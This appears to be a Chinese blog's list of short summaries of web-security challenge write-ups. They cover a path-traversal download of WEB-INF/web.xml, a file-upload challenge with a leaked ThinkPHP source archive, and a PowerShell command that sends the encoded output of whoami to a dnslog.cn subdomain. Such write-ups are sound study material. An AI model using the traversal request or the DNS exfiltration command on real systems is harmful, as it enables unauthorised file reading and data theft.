摘要：查看功能 打开为上传文件 上传一个正常图片 点击下载，查看请求 访问/DownloadServlet?filename=../../../WEB-INF/web.xml，发现存在任意文件下载 web.xml内容 <?xml version="1.0" encoding="UTF-8"?> <web- 阅读全文

摘要：查看功能 进入页面，有登陆和注册功能 注册账号 登陆发现文件上传功能 上传普通图片normal.gif，查看页面代码 发现文件名被重命名，且后缀被改为png 扫目录发现www.tar.gz，源码泄露，使用tp5框架 源码 目录结构 route.php <?php // + // | ThinkPHP 阅读全文

摘要：#Windows powershell curl "$([System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($(whoami))).Replace('=','AA')).h54w7r.dnslog.cn" #L 阅读全文